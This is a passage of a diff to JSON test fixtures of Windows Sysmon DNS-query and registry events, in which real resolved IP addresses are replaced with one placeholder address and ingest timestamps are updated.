Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1580,17 +1573,17 @@ "type": "CNAME" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -1607,14 +1600,13 @@ "g.bing.com" ], "ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741115800Z", + "ingested": "2021-12-09T13:50:23.456668500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1674,12 +1666,12 @@ }, "answers": [ { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { 
@@ -1694,13 +1686,13 @@ "lg3.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741123900Z", + "ingested": "2021-12-09T13:50:23.456674100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1764,22 +1756,22 @@ "type": "CNAME" }, { - "data": "54.88.96.255", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.233.100.168", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.209.58.223", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "54.88.96.255", - "34.233.100.168", - "54.209.58.223" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -1795,15 +1787,13 @@ "service.sp.advertising.com" ], "ip": [ - "54.88.96.255", - "34.233.100.168", - "54.209.58.223" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741132300Z", + "ingested": "2021-12-09T13:50:23.456679700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:54.88.96.255;::ffff:34.233.100.168;::ffff:54.209.58.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -1863,7 +1853,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741141Z", + "ingested": "2021-12-09T13:50:23.456685200Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:44.723248500Z'/\u003e\u003cEventRecordID\u003e2686\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:44.714\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-7554-5eb1-6d00-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4320\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\u003c/Data\u003e\u003cData Name='Details'\u003eBinary Data\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -1932,12 +1922,12 @@ "type": "CNAME" }, { - "data": "184.25.176.117", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "184.25.176.117" + "89.160.20.156" ] }, "network": { 
@@ -1954,13 +1944,13 @@ "sb.scorecardresearch.com" ], "ip": [ - "184.25.176.117" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741149300Z", + "ingested": "2021-12-09T13:50:23.456691100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:184.25.176.117;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2028,12 +2018,12 @@ "type": "CNAME" }, { - "data": "40.114.54.223", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "40.114.54.223" + "89.160.20.156" ] }, "network": { 
@@ -2050,13 +2040,13 @@ "otf.msn.com" ], "ip": [ - "40.114.54.223" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741157700Z", + "ingested": "2021-12-09T13:50:23.456696700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:40.114.54.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -2122,7 +2112,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741166300Z", + "ingested": "2021-12-09T13:50:23.456702400Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:44.726009900Z'/\u003e\u003cEventRecordID\u003e2687\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:44.714\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-77ae-5eb1-2c03-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e6072\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\regedit.exe\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Key 2\u003c/Data\u003e\u003cData Name='Details'\u003eQWORD (0x00000000-0x00000005)\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -2183,7 +2173,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741174600Z", + "ingested": "2021-12-09T13:50:23.456708300Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:46.818821400Z'/\u003e\u003cEventRecordID\u003e2690\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:46.808\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-7554-5eb1-6d00-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4320\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\ertrqvg.rkr\u003c/Data\u003e\u003cData Name='Details'\u003eBinary Data\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -2244,47 +2234,47 @@ }, "answers": [ { - "data": "35.171.101.225", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.196.57.87", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.194.164.46", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.233.181.142", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.194.167.169", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.193.242.172", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.234.152.11", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.206.12.124", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "35.171.101.225", - "34.196.57.87", - "34.194.164.46", - "34.233.181.142", - "34.194.167.169", - "34.193.242.172", - "34.234.152.11", - "34.206.12.124" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -2299,20 +2289,13 @@ "ping.chartbeat.net" ], "ip": [ - "35.171.101.225", - "34.196.57.87", - "34.194.164.46", - "34.233.181.142", - "34.194.167.169", - "34.193.242.172", - "34.234.152.11", - "34.206.12.124" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741182900Z", + "ingested": "2021-12-09T13:50:23.456714Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 